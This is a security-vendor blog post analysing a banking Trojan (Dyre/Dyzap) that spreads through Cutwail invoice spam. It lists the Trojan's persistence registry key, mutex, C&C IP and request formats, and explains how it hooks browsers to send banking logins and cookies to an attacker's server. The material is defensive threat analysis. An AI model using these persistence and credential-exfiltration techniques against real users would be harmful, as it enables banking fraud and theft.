Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Analysis of a New Banking Trojan Spammed by Cutwail

The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail's portfolio is to use links pointing to popular file hosting services. Over the past weeks, we have observed spam that claims to be an unpaid invoice from a certain bank.

11477_bb00d13a-20ec-4591-9e30-543d3ea4b163
Influx of Invoice Spam Campaign detected by Trustwave Secure Email Gateway

Currently, one of the most common themes in malicious spam campaigns are around claims of an invoice or product order with either ZIP file attachments or links to a ZIP/RAR file hosted on the web. This high volume campaign contains links to the file sharing services, Dropbox and Cubby. The files hosted are ZIP files with filenames such as invoice_<digit>.zip and document_<digit>.zip.

7906_0e3a7a61-46ec-4c07-8ba7-c5a1ba75e764

Malware Payload

After downloading and extracting the malware, we noticed that it uses an Adobe PDF icon to trick users into believing it is a harmless portable document file. When run, the executable file drops a copy of itself in to the Windows %AppData% (application data) directory as googleupdaterr.exe. It then creates an autorun registry to execute itself at Windows startup:

HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\RunGoogleUpdate = "%AppData%\googleupdaterr.exe"

A code stored in the malware's body is then injected to Explorer.exe. It also creates an infection marker in the Explorer.exe process by creating a Mutex named "RangisMutex5"

9439_59e38338-d76a-4df4-80f7-85a7cf84ca19

Antivirus companies have dubbed the loader of this new banking Trojan "Dyranges or Trojan Dyzap," and so has the DLL code injected to explorer.exe. A detection name perhaps taken from a PDB path found in the malware body:

12397_e85044f4-2238-4b0f-b9e1-820055eefd81
The malware PDB path of a project named DYRE. Interesting fact "zapuskator2.pdb" is a Russian translation of "executer2.pdb"

A configuration file named userdata.dat is then dropped in the %AppData% directory containing the BotID, encrypted configuration and a Boolean variable named "AUTOBACKCONN". We assume that setting AUTOBACKCONN to True enables the persistent connection of the bot to its command and control server.

7812_09a7efd8-1a91-472f-a74b-8950a47688c2

Right after the malware installation, the Trojan sends the following GET request to its command and control server with the IP address 192.99.6.61. Here's the sequence communication with the server:

  1. The first GET request is the "publickey" request using the format "/cho1017/<botid>/5/publickey/".
  2. The bot then reports the OS version of the infected system to its C&C server using the format "/cho1017/<botid>/0/<Windows Version>/".
  3. Then an unknown GET request "/58/1/ ", after which the C&C server replies back with the ThreadID.

10867_9d91a85d-124e-45a7-a9a6-62cc16fdf304

After the initial server handshake, The trojan tries to maintain the connectivity to its server through an ongoing GET request using the format:

GET /cho1017/<botid>/1/<base64 data>/HTTP/1.1User-Agent: Wget/1.9Host: 192.99.6.61

9023_46c5608a-d5ec-423e-b98e-ca93b6f1e33d

This banking Trojan hooks Google Chrome, Firefox or Internet Explorer browsers. This browser hooking function enables the Trojan to intercept user searches, browser cookies and sensitive banking information.

11999_d44aecc3-d19d-404c-8428-f49bf656091f

The Trojan then monitors a list of banking websites. When a victim visits a banking website being monitored, the information entered by the victim is intercepted and sent to the cybercriminal's server. The snippet of code below is the function where the Trojan monitors various banking URLs and where the intercepted data is sent to a remote IP address at port 12081.

10277_80f51001-e8b2-4e5d-8a6c-847213f2c274

The packet capture below shows the POST request intercepted by the Trojan right after log-in to a monitored banking website. The POST data which includes the login credentials and cookies are sent to the cybercriminal's server.

8421_287e198e-6abf-409a-95b3-060079f98dce

Acting as a man-in-the-middle, the Trojan sends the intercepted POST data to the cybercriminal's IP address. But the data is also sent through the normal SSL encrypted tunnel between the victim's browser and the bank's web server which hides the suspicious activity going on in the background.

8629_329a39c5-2f15-4116-b70c-3ba58eb5c80e

As of this writing, the offending IP address is offline. We are not sure if it was taken down or the cybercriminal moved to a different server. But according to our intelligence, the attacker's IP address was linked to an underground drop ship service Global Blackpoint, a service popular for carders (and other scammers). It also hosts various phishing pages targeting banking institutions.

12700_f472711e-e01a-428e-a0ed-0d42ab8f706f
Global Blackpoint Login Panel

To wrap up, we always advise users to be wary when clicking links in emails. Extra scrutiny should be placed on links to common file sharing websites such as Dropbox and Cubby, especially now that cybercriminals have started to utilize them for hosting their malware. Trustwave Secure Email Gateway users are protected from this malicious spam campaign.

Latest SpiderLabs Blogs

Welcome to Adventures in Cybersecurity: The Defender Series

I’m happy to say I’m done chasing Microsoft certifications (AZ104/AZ500/SC100), and as a result, I’ve had the time to put some effort into a blog series that hopefully will entertain and inform you...

Read More

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More

Breakdown of Tycoon Phishing-as-a-Service System

Just weeks after Trustwave SpiderLabs reported on the Greatness phishing-as-a-service (PaaS) framework, SpiderLabs’ Email Security team is tracking another PaaS called Tycoon Group.

Read More